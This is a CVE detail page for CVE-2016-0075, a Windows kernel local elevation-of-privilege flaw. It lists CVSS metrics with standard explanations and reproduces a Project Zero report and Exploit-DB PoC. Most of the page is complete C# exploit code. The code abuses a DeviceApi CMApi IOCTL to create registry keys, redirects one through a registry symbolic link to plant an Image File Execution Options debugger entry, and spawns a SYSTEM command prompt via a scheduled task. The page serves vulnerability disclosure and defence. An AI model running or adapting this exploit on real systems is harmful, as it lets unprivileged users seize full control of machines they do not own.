CVE-2016-0075 : Detail

CVE-2016-0075

5.5
/
MEDIUM
A01-Broken Access Control
0.4%V3
Local
2016-10-13 23:00 +00:00
2018-10-12 17:57 +00:00

Alert for a CVE

Stay informed of any changes for a specific CVE.
Alert management

Descriptions

The kernel in Microsoft Windows 8.1, Windows Server 2012 Gold and R2, Windows RT 8.1, and Windows 10 Gold, 1511, and 1607 allows local users to gain privileges via a crafted application that makes an API call to access sensitive information in the registry, aka "Windows Kernel Local Elevation of Privilege Vulnerability," a different vulnerability than CVE-2016-0073.

Informations

Related Weaknesses

CWE-ID Weakness Name Source
CWE-200 Exposure of Sensitive Information to an Unauthorized Actor
The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information.

Metrics

Metric Score Severity CVSS Vector Source
V3.0 5.5 MEDIUM CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N

Base: Exploitabilty Metrics

The Exploitability metrics reflect the characteristics of the thing that is vulnerable, which we refer to formally as the vulnerable component.

Attack Vector

This metric reflects the context by which vulnerability exploitation is possible.

Local

A vulnerability exploitable with Local access means that the vulnerable component is not bound to the network stack, and the attacker's path is via read/write/execute capabilities. In some cases, the attacker may be logged in locally in order to exploit the vulnerability, otherwise, she may rely on User Interaction to execute a malicious file.

Attack Complexity

This metric describes the conditions beyond the attacker's control that must exist in order to exploit the vulnerability.

Low

Specialized access conditions or extenuating circumstances do not exist. An attacker can expect repeatable success against the vulnerable component.

Privileges Required

This metric describes the level of privileges an attacker must possess before successfully exploiting the vulnerability.

None

The attacker is unauthorized prior to attack, and therefore does not require any access to settings or files to carry out an attack.

User Interaction

This metric captures the requirement for a user, other than the attacker, to participate in the successful compromise of the vulnerable component.

Required

Successful exploitation of this vulnerability requires a user to take some action before the vulnerability can be exploited. For example, a successful exploit may only be possible during the installation of an application by a system administrator.

Base: Scope Metrics

An important property captured by CVSS v3.0 is the ability for a vulnerability in one software component to impact resources beyond its means, or privileges.

Scope

Formally, Scope refers to the collection of privileges defined by a computing authority (e.g. an application, an operating system, or a sandbox environment) when granting access to computing resources (e.g. files, CPU, memory, etc). These privileges are assigned based on some method of identification and authorization. In some cases, the authorization may be simple or loosely controlled based upon predefined rules or standards. For example, in the case of Ethernet traffic sent to a network switch, the switch accepts traffic that arrives on its ports and is an authority that controls the traffic flow to other switch ports.

Unchanged

An exploited vulnerability can only affect resources managed by the same authority. In this case the vulnerable component and the impacted component are the same.

Base: Impact Metrics

The Impact metrics refer to the properties of the impacted component.

Confidentiality Impact

This metric measures the impact to the confidentiality of the information resources managed by a software component due to a successfully exploited vulnerability.

High

There is total loss of confidentiality, resulting in all resources within the impacted component being divulged to the attacker. Alternatively, access to only some restricted information is obtained, but the disclosed information presents a direct, serious impact. For example, an attacker steals the administrator's password, or private encryption keys of a web server.

Integrity Impact

This metric measures the impact to integrity of a successfully exploited vulnerability. Integrity refers to the trustworthiness and veracity of information.

None

There is no loss of integrity within the impacted component.

Availability Impact

This metric measures the impact to the availability of the impacted component resulting from a successfully exploited vulnerability.

None

There is no impact to availability within the impacted component.

Temporal Metrics

The Temporal metrics measure the current state of exploit techniques or code availability, the existence of any patches or workarounds, or the confidence that one has in the description of a vulnerability.

Environmental Metrics

nvd@nist.gov
V2 2.1 AV:L/AC:L/Au:N/C:P/I:N/A:N nvd@nist.gov

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Exploit information

Exploit Database EDB-ID : 40573

Publication date : 2016-10-17 22:00 +00:00
Author : Google Security Research
EDB Verified : Yes

/* Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=872 Windows: DeviceApi CMApi PiCMOpenClassKey Arbitrary Registry Key Write EoP Platform: Windows 10 10586 not tested 8.1 Update 2 or Windows 7 Class: Elevation of Privilege Summary: The DeviceApi CMApi PiCMOpenClassKey IOCTL allows a normal user to create arbitrary registry keys in the system hive leading to elevation of privilege. Description: The DeviceApi is a driver implemented inside the kernel which exposes a number of devices. One of those is CMApi which presumably is short for configuration manager API as it primarily exposes device configuration from the registry to the caller. The device exposes calls using IOCTLs, in theory anything which “creates” or “deletes” an object is limited behind an access check which only administrators have access to. However certain calls feed into the call PnpCtxRegCreateTree which will allow a user to open parts of the registry, and if they’re not there will create the keys. This is a problem as the keys are created in the user’s context using ZwCreateKey but without forcing an access check (it does this intentionally, as otherwise the user couldn’t create the key). All we need to do is find a CMApi IOCTL which will create the arbitrary keys for us. Fortunately it’s not that simple, all the ones I find using the tree creation function verify that string being passed from the user meets some valid criteria and is always placed into a subkey which the user doesn’t have direct control over. However I noticed PiCMOpenDeviceKey allows a valid 3 part path, of the form ABC\DEF\XYZ to be specified and the only criteria for creating this key is it exists as a valid device under CurrentControlSet\Enum, however the keys will be created under CurrentControlSet\Hardware Profiles which doesn’t typically exist. The majority of calls to this IOCTL will apply a very restrictive security descriptor to the new keys, however if you specify the 0x200 device type flag it will use the default SD which will be inherited from the parent key. Even if this didn’t provide a useful ACE (in this case it has the default CREATOR OWNER giving full access) as it’s created under our user context we are the owner and so could rewrite the DACL anyway. To convert this into a full arbitrary write we can specify a device path which doesn’t already exist and it will create the three registry keys. If we now delete the last key and replace it with a symbolic link we can point it at any arbitrary key. As the system hive is trusted this isn’t affected by the inter-hive symbolic link protections (and at anyrate services is in the same hive), however this means that the exploit won’t work from low-IL due to restrictions on creating symbolic links from sandboxes. You should be treating anything which calls PnpCtxRegCreateTree or SysCtxRegCreateKey as suspect, especially if no explicit security descriptor is being passed. For example you can use PiCMOpenDeviceInterfaceKey to do something very similar and get an arbitrary Device Parameters key created with full control for any device interface which doesn’t already have one. You can’t use the same symbolic link trick here (you only control the leaf key) however there might be a driver which has exploitable behaviour if the user can create a arbitrary Device Parameters key. Proof of Concept: I’ve provided a PoC as a C# source code file. You need to compile it first targeted .NET 4 and above. It will create a new IFEO for a executable we know can be run from the task scheduler at system. 1) Compile the C# source code file. 2) Execute the PoC executable as a normal user. 3) The PoC should print that it successfully created the key. You should find an interactive command prompt running at system on the desktop. Expected Result: The key access should fail, or at least the keys shouldn’t be writable by the current user. Observed Result: The key access succeeds and a system level command prompt is created. */ using Microsoft.Win32; using Microsoft.Win32.SafeHandles; using System; using System.Collections.Generic; using System.Diagnostics; using System.Linq; using System.Reflection; using System.Runtime.InteropServices; using System.Security.AccessControl; using System.Text; using System.Threading; namespace PoC { class Program { [Flags] public enum AttributeFlags : uint { None = 0, Inherit = 0x00000002, Permanent = 0x00000010, Exclusive = 0x00000020, CaseInsensitive = 0x00000040, OpenIf = 0x00000080, OpenLink = 0x00000100, KernelHandle = 0x00000200, ForceAccessCheck = 0x00000400, IgnoreImpersonatedDevicemap = 0x00000800, DontReparse = 0x00001000, } [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)] public sealed class UnicodeString { ushort Length; ushort MaximumLength; [MarshalAs(UnmanagedType.LPWStr)] string Buffer; public UnicodeString(string str) { Length = (ushort)(str.Length * 2); MaximumLength = (ushort)((str.Length * 2) + 1); Buffer = str; } } [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)] public sealed class ObjectAttributes : IDisposable { int Length; IntPtr RootDirectory; IntPtr ObjectName; AttributeFlags Attributes; IntPtr SecurityDescriptor; IntPtr SecurityQualityOfService; private static IntPtr AllocStruct(object s) { int size = Marshal.SizeOf(s); IntPtr ret = Marshal.AllocHGlobal(size); Marshal.StructureToPtr(s, ret, false); return ret; } private static void FreeStruct(ref IntPtr p, Type struct_type) { Marshal.DestroyStructure(p, struct_type); Marshal.FreeHGlobal(p); p = IntPtr.Zero; } public ObjectAttributes(string object_name, AttributeFlags flags, IntPtr rootkey) { Length = Marshal.SizeOf(this); if (object_name != null) { ObjectName = AllocStruct(new UnicodeString(object_name)); } Attributes = flags; RootDirectory = rootkey; } public ObjectAttributes(string object_name, AttributeFlags flags) : this(object_name, flags, IntPtr.Zero) { } public void Dispose() { if (ObjectName != IntPtr.Zero) { FreeStruct(ref ObjectName, typeof(UnicodeString)); } GC.SuppressFinalize(this); } ~ObjectAttributes() { Dispose(); } } [Flags] public enum LoadKeyFlags { None = 0, AppKey = 0x10, Exclusive = 0x20, Unknown800 = 0x800, ReadOnly = 0x2000, } [Flags] public enum GenericAccessRights : uint { None = 0, GenericRead = 0x80000000, GenericWrite = 0x40000000, GenericExecute = 0x20000000, GenericAll = 0x10000000, Delete = 0x00010000, ReadControl = 0x00020000, WriteDac = 0x00040000, WriteOwner = 0x00080000, Synchronize = 0x00100000, MaximumAllowed = 0x02000000, } public class NtException : ExternalException { [DllImport("kernel32.dll", CharSet = CharSet.Unicode, SetLastError = true)] private static extern IntPtr GetModuleHandle(string modulename); [Flags] enum FormatFlags { AllocateBuffer = 0x00000100, FromHModule = 0x00000800, FromSystem = 0x00001000, IgnoreInserts = 0x00000200 } [DllImport("kernel32.dll", CharSet = CharSet.Unicode, SetLastError = true)] private static extern int FormatMessage( FormatFlags dwFlags, IntPtr lpSource, int dwMessageId, int dwLanguageId, out IntPtr lpBuffer, int nSize, IntPtr Arguments ); [DllImport("kernel32.dll")] private static extern IntPtr LocalFree(IntPtr p); private static string StatusToString(int status) { IntPtr buffer = IntPtr.Zero; try { if (FormatMessage(FormatFlags.AllocateBuffer | FormatFlags.FromHModule | FormatFlags.FromSystem | FormatFlags.IgnoreInserts, GetModuleHandle("ntdll.dll"), status, 0, out buffer, 0, IntPtr.Zero) > 0) { return Marshal.PtrToStringUni(buffer); } } finally { if (buffer != IntPtr.Zero) { LocalFree(buffer); } } return String.Format("Unknown Error: 0x{0:X08}", status); } public NtException(int status) : base(StatusToString(status)) { } } public static void StatusToNtException(int status) { if (status < 0) { throw new NtException(status); } } [Flags] public enum FileOpenOptions { None = 0, DirectoryFile = 0x00000001, WriteThrough = 0x00000002, SequentialOnly = 0x00000004, NoIntermediateBuffering = 0x00000008, SynchronousIoAlert = 0x00000010, SynchronousIoNonAlert = 0x00000020, NonDirectoryFile = 0x00000040, CreateTreeConnection = 0x00000080, CompleteIfOplocked = 0x00000100, NoEaKnowledge = 0x00000200, OpenRemoteInstance = 0x00000400, RandomAccess = 0x00000800, DeleteOnClose = 0x00001000, OpenByFileId = 0x00002000, OpenForBackupIntent = 0x00004000, NoCompression = 0x00008000, OpenRequiringOplock = 0x00010000, ReserveOpfilter = 0x00100000, OpenReparsePoint = 0x00200000, OpenNoRecall = 0x00400000, OpenForFreeSpaceQuery = 0x00800000 } public class IoStatusBlock { public IntPtr Pointer; public IntPtr Information; public IoStatusBlock(IntPtr pointer, IntPtr information) { Pointer = pointer; Information = information; } public IoStatusBlock() { } } [Flags] public enum ShareMode { None = 0, Read = 0x00000001, Write = 0x00000002, Delete = 0x00000004, } [Flags] public enum FileAccessRights : uint { None = 0, ReadData = 0x0001, WriteData = 0x0002, AppendData = 0x0004, ReadEa = 0x0008, WriteEa = 0x0010, Execute = 0x0020, DeleteChild = 0x0040, ReadAttributes = 0x0080, WriteAttributes = 0x0100, GenericRead = 0x80000000, GenericWrite = 0x40000000, GenericExecute = 0x20000000, GenericAll = 0x10000000, Delete = 0x00010000, ReadControl = 0x00020000, WriteDac = 0x00040000, WriteOwner = 0x00080000, Synchronize = 0x00100000, MaximumAllowed = 0x02000000, } [DllImport("ntdll.dll")] public static extern int NtOpenFile( out IntPtr FileHandle, FileAccessRights DesiredAccess, ObjectAttributes ObjAttr, [In] [Out] IoStatusBlock IoStatusBlock, ShareMode ShareAccess, FileOpenOptions OpenOptions); [DllImport("ntdll.dll")] public static extern int NtDeviceIoControlFile( SafeFileHandle FileHandle, IntPtr Event, IntPtr ApcRoutine, IntPtr ApcContext, [In] [Out] IoStatusBlock IoStatusBlock, uint IoControlCode, SafeHGlobalBuffer InputBuffer, int InputBufferLength, SafeHGlobalBuffer OutputBuffer, int OutputBufferLength ); static T DeviceIoControl(SafeFileHandle FileHandle, uint IoControlCode, object input_buffer) { using (SafeStructureOutBuffer output = new SafeStructureOutBuffer()) { using (SafeStructureBuffer input = new SafeStructureBuffer(input_buffer)) { IoStatusBlock status = new IoStatusBlock(); StatusToNtException(NtDeviceIoControlFile(FileHandle, IntPtr.Zero, IntPtr.Zero, IntPtr.Zero, status, IoControlCode, input, input.Length, output, output.Length)); return output.Result; } } } public static SafeFileHandle OpenFile(string name, FileAccessRights DesiredAccess, ShareMode ShareAccess, FileOpenOptions OpenOptions, bool inherit) { AttributeFlags flags = AttributeFlags.CaseInsensitive; if (inherit) flags |= AttributeFlags.Inherit; using (ObjectAttributes obja = new ObjectAttributes(name, flags)) { IntPtr handle; IoStatusBlock iostatus = new IoStatusBlock(); StatusToNtException(NtOpenFile(out handle, DesiredAccess, obja, iostatus, ShareAccess, OpenOptions)); return new SafeFileHandle(handle, true); } } [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)] class CmApiOpenKeyData { public int cbSize; // 0 public int device_type; // 4 public int callback_id; // 8 [MarshalAs(UnmanagedType.LPWStr)] public string name; // c public int name_size; // 10 public GenericAccessRights desired_access; // 14 public int create; // 18 public int hardware_id; // 1c public int return_data_size; // 20 public CmApiOpenKeyData(int device_type, int callback_id, string name, GenericAccessRights desired_access, bool create, int hardware_id, int return_data_size) { this.cbSize = Marshal.SizeOf(this); this.device_type = device_type; this.callback_id = callback_id; this.name = name; this.name_size = (name.Length + 1) * 2; this.desired_access = desired_access; this.create = create ? 1 : 0; this.hardware_id = hardware_id; this.return_data_size = return_data_size; } } [StructLayout(LayoutKind.Sequential)] class CmApiOpenKeyResult { int size; public int status; public long handle; }; public class SafeHGlobalBuffer : SafeHandleZeroOrMinusOneIsInvalid { public SafeHGlobalBuffer(int length) : this(Marshal.AllocHGlobal(length), length, true) { } public SafeHGlobalBuffer(IntPtr buffer, int length, bool owns_handle) : base(owns_handle) { Length = length; SetHandle(buffer); } public int Length { get; private set; } protected override bool ReleaseHandle() { if (!IsInvalid) { Marshal.FreeHGlobal(handle); handle = IntPtr.Zero; } return true; } } public class SafeStructureBuffer : SafeHGlobalBuffer { Type _type; public SafeStructureBuffer(object value) : base(Marshal.SizeOf(value)) { _type = value.GetType(); Marshal.StructureToPtr(value, handle, false); } protected override bool ReleaseHandle() { if (!IsInvalid) { Marshal.DestroyStructure(handle, _type); } return base.ReleaseHandle(); } } public class SafeStructureOutBuffer : SafeHGlobalBuffer { public SafeStructureOutBuffer() : base(Marshal.SizeOf(typeof(T))) { } public T Result { get { if (IsInvalid) throw new ObjectDisposedException("handle"); return Marshal.PtrToStructure(handle); } } } static void EnumKeys(RegistryKey rootkey, IEnumerable name_parts, List names, int maxdepth, int current_depth) { if (current_depth == maxdepth) { names.Add(String.Join(@"\", name_parts)); } else { foreach (string subkey in rootkey.GetSubKeyNames()) { using (RegistryKey key = rootkey.OpenSubKey(subkey)) { if (key != null) { EnumKeys(key, name_parts.Concat(new string[] { subkey }), names, maxdepth, current_depth + 1); } } } } } static IEnumerable GetValidDeviceNames() { List names = new List(); using (RegistryKey rootkey = Registry.LocalMachine.OpenSubKey(@"SYSTEM\CurrentControlSet\Enum")) { EnumKeys(rootkey, new string[0], names, 3, 0); } return names; } static RegistryKey OpenProfileKey(string name) { RegistryKey ret = Registry.LocalMachine.OpenSubKey(@"SYSTEM\CurrentControlSet\Hardware Profiles\0001\SYSTEM\CurrentControlSet\Enum"); if (name != null) { try { return ret.OpenSubKey(name); } finally { ret.Close(); } } else { return ret; } } static string FindFirstAccessibleDevice() { foreach (string device in GetValidDeviceNames()) { try { using (RegistryKey key = OpenProfileKey(device)) { if (key == null) { return device; } } } catch { } } return null; } [Flags] enum KeyCreateOptions { None = 0, NonVolatile = None, Volatile = 1, CreateLink = 2, BackupRestore = 4, } [DllImport("ntdll.dll", CharSet = CharSet.Unicode)] static extern int NtCreateKey( out IntPtr KeyHandle, GenericAccessRights DesiredAccess, [In] ObjectAttributes ObjectAttributes, int TitleIndex, [In] UnicodeString Class, KeyCreateOptions CreateOptions, out int Disposition); static SafeRegistryHandle CreateKey(SafeRegistryHandle rootkey, string path, AttributeFlags flags, KeyCreateOptions options) { using (ObjectAttributes obja = new ObjectAttributes(path, flags | AttributeFlags.CaseInsensitive, rootkey != null ? rootkey.DangerousGetHandle() : IntPtr.Zero)) { IntPtr handle; int disposition = 0; StatusToNtException(NtCreateKey(out handle, GenericAccessRights.MaximumAllowed, obja, 0, null, options, out disposition)); return new SafeRegistryHandle(handle, true); } } enum RegistryKeyType { Link = 6, } [DllImport("ntdll.dll", CharSet = CharSet.Unicode)] static extern int NtSetValueKey( SafeRegistryHandle KeyHandle, UnicodeString ValueName, int TitleIndex, RegistryKeyType Type, byte[] Data, int DataSize); [DllImport("ntdll.dll")] static extern int NtDeleteKey(SafeRegistryHandle KeyHandle); static void DeleteSymbolicLink(SafeRegistryHandle rootkey, string path) { using (SafeRegistryHandle key = CreateKey(rootkey, path, AttributeFlags.OpenLink | AttributeFlags.OpenIf, KeyCreateOptions.None)) { StatusToNtException(NtDeleteKey(key)); } } static SafeRegistryHandle CreateSymbolicLink(SafeRegistryHandle rootkey, string path, string target) { SafeRegistryHandle key = CreateKey(rootkey, path, AttributeFlags.OpenIf | AttributeFlags.OpenLink, KeyCreateOptions.CreateLink); try { UnicodeString value_name = new UnicodeString("SymbolicLinkValue"); byte[] data = Encoding.Unicode.GetBytes(target); StatusToNtException(NtSetValueKey(key, value_name, 0, RegistryKeyType.Link, data, data.Length)); SafeRegistryHandle ret = key; key = null; return ret; } finally { if (key != null) { NtDeleteKey(key); } } } static RegistryKey CreateDeviceKey(string device_name) { using (SafeFileHandle handle = OpenFile(@"\Device\DeviceApi\CMApi", FileAccessRights.Synchronize | FileAccessRights.GenericRead | FileAccessRights.GenericWrite, ShareMode.None, FileOpenOptions.NonDirectoryFile | FileOpenOptions.SynchronousIoNonAlert, false)) { CmApiOpenKeyData data = new CmApiOpenKeyData(0x211, 1, device_name, GenericAccessRights.MaximumAllowed, true, 0, Marshal.SizeOf(typeof(CmApiOpenKeyResult))); CmApiOpenKeyResult result = DeviceIoControl(handle, 0x47085B, data); StatusToNtException(result.status); return RegistryKey.FromHandle(new SafeRegistryHandle(new IntPtr(result.handle), true)); } } public enum TokenInformationClass { TokenSessionId = 12 } [DllImport("ntdll.dll")] public static extern int NtClose(IntPtr handle); [DllImport("ntdll.dll", CharSet = CharSet.Unicode)] public static extern int NtOpenProcessTokenEx( IntPtr ProcessHandle, GenericAccessRights DesiredAccess, AttributeFlags HandleAttributes, out IntPtr TokenHandle); public sealed class SafeKernelObjectHandle : SafeHandleZeroOrMinusOneIsInvalid { public SafeKernelObjectHandle() : base(true) { } public SafeKernelObjectHandle(IntPtr handle, bool owns_handle) : base(owns_handle) { SetHandle(handle); } protected override bool ReleaseHandle() { if (!IsInvalid) { NtClose(this.handle); this.handle = IntPtr.Zero; return true; } return false; } } public enum TokenType { Primary = 1, Impersonation = 2 } [DllImport("ntdll.dll", CharSet = CharSet.Unicode)] public static extern int NtDuplicateToken( IntPtr ExistingTokenHandle, GenericAccessRights DesiredAccess, ObjectAttributes ObjectAttributes, bool EffectiveOnly, TokenType TokenType, out IntPtr NewTokenHandle ); public static SafeKernelObjectHandle DuplicateToken(SafeKernelObjectHandle existing_token) { IntPtr new_token; using (ObjectAttributes obja = new ObjectAttributes(null, AttributeFlags.None)) { StatusToNtException(NtDuplicateToken(existing_token.DangerousGetHandle(), GenericAccessRights.MaximumAllowed, obja, false, TokenType.Primary, out new_token)); return new SafeKernelObjectHandle(new_token, true); } } public static SafeKernelObjectHandle OpenProcessToken() { IntPtr new_token; StatusToNtException(NtOpenProcessTokenEx(new IntPtr(-1), GenericAccessRights.MaximumAllowed, AttributeFlags.None, out new_token)); using (SafeKernelObjectHandle ret = new SafeKernelObjectHandle(new_token, true)) { return DuplicateToken(ret); } } [DllImport("ntdll.dll")] public static extern int NtSetInformationToken( SafeKernelObjectHandle TokenHandle, TokenInformationClass TokenInformationClass, byte[] TokenInformation, int TokenInformationLength); public static void SetTokenSessionId(SafeKernelObjectHandle token, int session_id) { byte[] buffer = BitConverter.GetBytes(session_id); NtSetInformationToken(token, TokenInformationClass.TokenSessionId, buffer, buffer.Length); } [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)] struct STARTUPINFO { public Int32 cb; public string lpReserved; public string lpDesktop; public string lpTitle; public Int32 dwX; public Int32 dwY; public Int32 dwXSize; public Int32 dwYSize; public Int32 dwXCountChars; public Int32 dwYCountChars; public Int32 dwFillAttribute; public Int32 dwFlags; public Int16 wShowWindow; public Int16 cbReserved2; public IntPtr lpReserved2; public IntPtr hStdInput; public IntPtr hStdOutput; public IntPtr hStdError; } [StructLayout(LayoutKind.Sequential)] internal struct PROCESS_INFORMATION { public IntPtr hProcess; public IntPtr hThread; public int dwProcessId; public int dwThreadId; } enum CreateProcessFlags { CREATE_BREAKAWAY_FROM_JOB = 0x01000000, CREATE_DEFAULT_ERROR_MODE = 0x04000000, CREATE_NEW_CONSOLE = 0x00000010, CREATE_NEW_PROCESS_GROUP = 0x00000200, CREATE_NO_WINDOW = 0x08000000, CREATE_PROTECTED_PROCESS = 0x00040000, CREATE_PRESERVE_CODE_AUTHZ_LEVEL = 0x02000000, CREATE_SEPARATE_WOW_VDM = 0x00000800, CREATE_SHARED_WOW_VDM = 0x00001000, CREATE_SUSPENDED = 0x00000004, CREATE_UNICODE_ENVIRONMENT = 0x00000400, DEBUG_ONLY_THIS_PROCESS = 0x00000002, DEBUG_PROCESS = 0x00000001, DETACHED_PROCESS = 0x00000008, EXTENDED_STARTUPINFO_PRESENT = 0x00080000, INHERIT_PARENT_AFFINITY = 0x00010000 } [DllImport("advapi32.dll", SetLastError = true, CharSet = CharSet.Auto)] static extern bool CreateProcessAsUser( IntPtr hToken, string lpApplicationName, string lpCommandLine, IntPtr lpProcessAttributes, IntPtr lpThreadAttributes, bool bInheritHandles, CreateProcessFlags dwCreationFlags, IntPtr lpEnvironment, string lpCurrentDirectory, ref STARTUPINFO lpStartupInfo, out PROCESS_INFORMATION lpProcessInformation); static void SpawnInteractiveCmd(int sessionid) { SafeKernelObjectHandle token = OpenProcessToken(); SetTokenSessionId(token, sessionid); STARTUPINFO startInfo = new STARTUPINFO(); startInfo.cb = Marshal.SizeOf(startInfo); PROCESS_INFORMATION procInfo; CreateProcessAsUser(token.DangerousGetHandle(), null, "cmd.exe", IntPtr.Zero, IntPtr.Zero, false, CreateProcessFlags.CREATE_NEW_CONSOLE, IntPtr.Zero, null, ref startInfo, out procInfo); } static bool DoExploit() { SafeRegistryHandle symbolic_link = null; try { string device_name = FindFirstAccessibleDevice(); if (device_name != null) { Console.WriteLine("[SUCCESS]: Found Device: {0}", device_name); } else { throw new ArgumentException("Couldn't find a valid device"); } using (RegistryKey key = CreateDeviceKey(device_name)) { StatusToNtException(NtDeleteKey(key.Handle)); } Console.WriteLine("[SUCCESS]: Deleted leaf key"); using (RegistryKey profile_key = OpenProfileKey(null)) { symbolic_link = CreateSymbolicLink(profile_key.Handle, device_name, @"\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wsqmcons.exe"); } Console.WriteLine("[SUCCESS]: Created symbolic link"); using (RegistryKey key = CreateDeviceKey(device_name)) { key.SetValue("Debugger", String.Format("\"{0}\" {1}", Assembly.GetCallingAssembly().Location, GetSessionId())); Console.WriteLine("[SUCCESS]: Created IFEO key"); EventWaitHandle ev = new EventWaitHandle(false, EventResetMode.AutoReset, @"Global\{376693BE-1931-4AF9-8D56-C629F9094745}"); Process p = Process.Start("schtasks", @"/Run /TN ""\Microsoft\Windows\Customer Experience Improvement Program\Consolidator"""); ev.WaitOne(); NtDeleteKey(key.Handle); } } catch (Exception ex) { Console.WriteLine("[ERROR]: {0}", ex.Message); } finally { if (symbolic_link != null) { NtDeleteKey(symbolic_link); } } return false; } static int GetSessionId() { using (Process p = Process.GetCurrentProcess()) { return p.SessionId; } } static void Main(string[] args) { if (GetSessionId() > 0) { DoExploit(); } else { Console.WriteLine("[SUCCESS]: Running as service"); EventWaitHandle ev = EventWaitHandle.OpenExisting(@"Global\{376693BE-1931-4AF9-8D56-C629F9094745}", EventWaitHandleRights.Modify); ev.Set(); if (args.Length > 1) { int session_id; if (!int.TryParse(args[0], out session_id)) { session_id = 0; } SpawnInteractiveCmd(session_id); } } } } }

Products Mentioned

Configuraton 0

Microsoft>>Windows_10 >> Version -

Microsoft>>Windows_10 >> Version 1511

Microsoft>>Windows_10 >> Version 1607

Microsoft>>Windows_8.1 >> Version *

Microsoft>>Windows_rt_8.1 >> Version *

Microsoft>>Windows_server_2012 >> Version -

Microsoft>>Windows_server_2012 >> Version r2

References

http://www.securityfocus.com/bid/93356
Tags : vdb-entry, x_refsource_BID
https://www.exploit-db.com/exploits/40573/
Tags : exploit, x_refsource_EXPLOIT-DB
Click on the button to the left (OFF), to authorize the inscription of cookie improving the functionalities of the site. Click on the button to the left (Accept all), to unauthorize the inscription of cookie improving the functionalities of the site.